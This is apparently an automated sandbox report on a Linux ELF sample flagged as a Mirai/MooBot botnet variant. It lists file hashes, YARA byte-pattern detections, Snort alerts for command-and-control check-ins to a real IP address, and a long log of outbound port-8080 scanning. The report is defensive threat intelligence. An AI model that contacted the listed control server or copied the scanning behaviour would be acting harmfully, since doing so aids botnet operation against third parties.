Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
QvyiI8SFTm.elf

Overview

General Information

Sample name:QvyiI8SFTm.elf
renamed because original name is a hash value
Original sample name:674d0a7fdcd07d7496e25f39b4bad83b.elf
Analysis ID:1417923
MD5:674d0a7fdcd07d7496e25f39b4bad83b
SHA1:88e2bf775d83fd8d9b0a0c7e76369bba22af513b
SHA256:5d352899a059337123d961aeed9a7942d3bdb977cff35765d16754f9cc3ffeb3
Tags:32elfintelmirai
Infos:

Detection

Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1417923
Start date and time:2024-03-31 09:19:13 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 18s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:QvyiI8SFTm.elf
renamed because original name is a hash value
Original Sample Name:674d0a7fdcd07d7496e25f39b4bad83b.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@8/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/QvyiI8SFTm.elf
PID:6256
Exit Code:
Exit Code Info:
Killed:True
Standard Output:
done.
Standard Error:[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
[main] cant remove reboot function.: No such file or directory
  • system is lnxubuntu20
  • dash New Fork (PID: 6320, Parent: 4331)
  • rm (PID: 6320, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.57BvmQ7cWd /tmp/tmp.4Vuw4Wy8Lc /tmp/tmp.3hJvBf7jEe
  • dash New Fork (PID: 6321, Parent: 4331)
  • rm (PID: 6321, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.57BvmQ7cWd /tmp/tmp.4Vuw4Wy8Lc /tmp/tmp.3hJvBf7jEe
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
QvyiI8SFTm.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    QvyiI8SFTm.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0x1630c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16320:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16334:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16348:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1635c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16370:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16384:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16398:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x163ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x163c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x163d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x163e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x163fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16410:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16424:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16438:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1644c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16460:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16474:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x16488:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1649c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    QvyiI8SFTm.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
    • 0x4870:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
    QvyiI8SFTm.elfLinux_Trojan_Mirai_5f7b67b8unknownunknown
    • 0xddc3:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
    QvyiI8SFTm.elfLinux_Trojan_Mirai_88de437funknownunknown
    • 0x9342:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
    Click to see the 3 entries
    SourceRuleDescriptionAuthorStrings
    6256.1.0000000008048000.0000000008062000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
      6256.1.0000000008048000.0000000008062000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1630c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16320:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16334:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16348:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1635c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16370:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16384:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16398:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x163ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x163c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x163d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x163e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x163fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16410:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16424:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16438:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1644c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16460:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16474:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x16488:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1649c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      6256.1.0000000008048000.0000000008062000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x4870:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      6256.1.0000000008048000.0000000008062000.r-x.sdmpLinux_Trojan_Mirai_5f7b67b8unknownunknown
      • 0xddc3:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
      6256.1.0000000008048000.0000000008062000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
      • 0x9342:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
      Click to see the 5 entries
      Timestamp:03/31/24-08:20:51.115574
      SID:2030490
      Source Port:54438
      Destination Port:56789
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:03/31/24-08:20:19.060762
      SID:2030490
      Source Port:45640
      Destination Port:56789
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:03/31/24-08:20:28.557867
      SID:2030490
      Source Port:47288
      Destination Port:56789
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:03/31/24-08:20:12.557314
      SID:2030490
      Source Port:44140
      Destination Port:56789
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:03/31/24-08:20:46.612915
      SID:2030490
      Source Port:53468
      Destination Port:56789
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:03/31/24-08:20:11.054788
      SID:2030490
      Source Port:44106
      Destination Port:56789
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:03/31/24-08:20:07.521659
      SID:2030490
      Source Port:44020
      Destination Port:56789
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:03/31/24-08:20:39.065517
      SID:2030490
      Source Port:50050
      Destination Port:56789
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: QvyiI8SFTm.elfAvira: detected
      Source: QvyiI8SFTm.elfVirustotal: Detection: 48%Perma Link
      Source: QvyiI8SFTm.elfJoe Sandbox ML: detected

      Networking

      barindex
      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:44020 -> 45.152.86.86:56789
      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:44106 -> 45.152.86.86:56789
      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:44140 -> 45.152.86.86:56789
      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:45640 -> 45.152.86.86:56789
      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47288 -> 45.152.86.86:56789
      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:50050 -> 45.152.86.86:56789
      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:53468 -> 45.152.86.86:56789
      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:54438 -> 45.152.86.86:56789
      Source: global trafficTCP traffic: 45.152.86.86 ports 56789,5,6,7,8,9
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 162.166.168.146:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 135.202.134.146:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 109.191.103.221:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 201.197.143.147:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 83.48.53.21:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 24.137.140.253:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 99.237.220.190:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 84.101.31.71:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 48.101.109.101:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 19.12.179.225:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 168.105.24.249:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 79.251.15.161:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 91.77.65.123:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 143.244.79.82:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 48.198.138.165:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 71.18.118.113:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 39.42.37.41:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 42.150.14.57:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 79.232.129.213:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 12.79.68.0:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 200.218.215.252:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 86.16.142.44:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 14.253.247.243:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 209.215.110.12:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 67.148.23.43:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 137.83.187.157:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 150.236.21.195:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 43.100.250.179:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 79.66.154.53:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 77.116.179.176:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 43.193.213.98:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 87.83.152.211:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 135.33.81.40:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 152.4.37.91:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 218.27.106.165:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 168.134.65.213:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 84.27.234.177:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 189.255.39.29:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 120.255.206.108:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 101.240.156.109:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 73.69.128.249:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 72.226.250.146:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 75.201.43.7:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 191.30.102.235:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 69.250.128.23:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 180.234.238.90:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 84.205.171.161:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 146.169.152.109:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 131.165.6.53:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 125.147.126.137:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 95.229.92.4:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 200.104.43.187:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 169.140.104.113:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 76.47.127.200:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 101.236.106.128:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 90.96.175.54:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 77.193.106.10:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 45.98.207.6:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 77.173.91.55:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 156.99.81.77:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 47.127.192.226:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 187.131.82.122:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 82.119.166.129:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 122.205.107.82:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 139.235.55.114:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 184.21.44.112:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 123.9.28.28:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 130.238.97.183:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 35.177.184.48:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 213.236.231.170:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 132.107.21.10:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 86.83.10.23:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 208.133.251.197:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 57.165.36.198:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 99.255.102.187:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 205.202.64.85:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 138.25.96.88:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 190.43.247.39:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 148.47.100.89:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 174.215.73.217:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 140.238.116.141:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 145.28.8.11:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 196.22.110.120:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 48.75.50.8:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 161.241.158.0:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 212.5.39.113:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 177.116.127.243:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 122.153.68.118:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 112.60.221.166:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 205.213.168.65:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 85.183.91.35:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 42.185.176.98:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 65.160.150.2:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 41.27.84.129:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 35.228.227.16:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 217.210.137.245:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 1.65.181.126:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 70.225.121.57:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 185.91.174.88:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 113.239.203.15:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 101.46.222.24:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 165.16.169.195:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 20.248.213.114:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 130.129.204.249:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 17.209.144.239:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 203.229.194.136:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 168.112.122.114:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 57.219.170.5:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 142.251.78.227:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 147.46.186.0:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 59.154.18.84:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 8.147.154.180:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 152.92.102.131:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 181.153.231.220:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 202.220.111.128:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 191.237.124.117:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 5.101.167.92:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 12.25.102.197:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 133.249.246.131:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 161.203.188.28:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 205.6.86.220:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 211.13.53.249:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 221.84.11.94:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 182.88.13.99:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 69.138.157.7:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 113.96.212.13:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 125.110.126.65:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 182.124.185.65:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 78.95.87.137:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 107.197.90.238:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 23.88.192.158:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 31.82.50.208:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 148.24.105.89:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 31.77.150.46:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 217.122.161.230:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 152.210.106.108:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 142.161.56.23:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 209.151.155.104:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 77.60.105.144:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 63.232.123.171:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 120.79.51.67:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 117.28.133.200:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 89.33.37.150:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 110.24.37.208:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 46.46.23.242:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 83.132.159.44:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 40.207.11.210:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 211.219.221.155:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 180.31.30.28:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 120.218.158.88:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 67.151.110.130:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 139.125.162.103:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 190.81.91.20:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 161.234.206.37:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 71.158.179.100:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 18.132.150.141:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 196.134.208.128:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 129.47.123.125:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 9.35.208.139:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 40.169.245.203:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 190.211.34.225:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 156.56.29.72:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 105.142.188.196:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 89.94.193.18:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 38.29.62.218:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 38.68.172.130:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 93.41.197.26:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 45.215.158.49:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 205.99.174.80:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 41.148.93.149:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 100.242.112.217:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 60.56.117.105:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 132.68.213.83:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 171.64.241.38:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 99.206.173.103:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 220.40.105.127:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 139.22.252.198:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 102.160.225.59:8080
